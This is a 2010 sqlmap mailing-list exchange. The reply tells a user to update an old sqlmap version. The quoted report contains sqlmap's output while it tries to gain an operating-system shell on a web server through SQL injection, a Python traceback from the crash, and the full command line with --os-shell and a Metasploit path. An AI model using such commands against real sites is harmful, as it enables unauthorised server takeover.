Re: [sqlmap-users] sqlmap error
Brought to you by:
inquisb
From: <ja...@ev...> - 2010-05-31 11:41:10
|
Ancient SQLmap. Update. On Mon, 31 May 2010 06:33:39 +0300, Ustupid MFU <ust...@gm...> wrote: > which web application language does the web server support?[1] ASP > (default)[2] PHP[3] JSP> 1[23:34:10] [WARNING] unable to retrieve the web > server document root please provide the web server document root > [C:/Inetpub/wwwroot/]: C:/xampp/htdocs/modules/weblinks0/[23:34:13] > [INFO] retrieved web server full paths: > '/modules/weblinks0/visit.php'please provide any additional web server > full path to try to upload the agent [C:/Inetpub/wwwroot/]: [23:34:16] > [WARNING] unable to upload the uploader agent on > '/modules/weblinks0'[23:34:16] [ERROR] unhandled exception in sqlmap/0.8, > please copy the command line and the following text and send by e-mail to > sql...@li... [1]. The developer will fix it as soon > as possible: sqlmap version: 0.8Python version: 2.6.5Operating system: > linux2Traceback (most recent call last): File "./sqlmap.py", line 77, > in main start() File > "/.rnd2/pa/sqlmap/lib/controller/controller.py", line 259, in start > action() File "/.rnd2/pa/sqlmap/lib/controller/action.py", line 141, > in action conf.dbmsHandler.osShell() File > "/.rnd2/pa/sqlmap/plugins/generic/takeover.py", line 98, in osShell > self.initEnv(web=web) File > "/.rnd2/pa/sqlmap/lib/takeover/abstraction.py", line 155, in initEnv > self.webInit() File "/.rnd2/pa/sqlmap/lib/takeover/web.py", line > 189, in webInit uplPage, _ = > Request.getPage(url=self.webUploaderUrl, direct=True, > raise404=False) File "/.rnd2/pa/sqlmap/lib/request/connect.py", line > 126, in getPage conn = urllib2.urlopen(req) File > "/usr/local/lib/python2.6/urllib2.py", line 126, in urlopen return > _opener.open(url, data, timeout) File > "/usr/local/lib/python2.6/urllib2.py", line 391, in open response > = self._open(req, data) File "/usr/local/lib/python2.6/urllib2.py", > line 409, in _open '_open', req) File > "/usr/local/lib/python2.6/urllib2.py", line 369, in _call_chain > result = func(*args) File "/usr/local/lib/python2.6/urllib2.py", > line 1161, in http_open return self.do_open(httplib.HTTPConnection, > req) File "/usr/local/lib/python2.6/urllib2.py", line 1107, in do_open > h = http_class(host, timeout=req.timeout) # will parse > host:port File "/usr/local/lib/python2.6/httplib.py", line 657, in > __init__ self._set_hostport(host, port) File > "/usr/local/lib/python2.6/httplib.py", line 682, in _set_hostport > raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])InvalidURL: > nonnumeric port: '' > [*] shutting down at: 23:34:16 > ./sqlmap.py -u 'http://somehost/modules/weblinks0/visit.php?lid=44 [2]' > --os-shell --msf-path /opt/metasploit3/msf3 > > Links: > ------ > [1] mailto:sql...@li... > [2] http://somehost/modules/weblinks0/visit.php?lid=44 |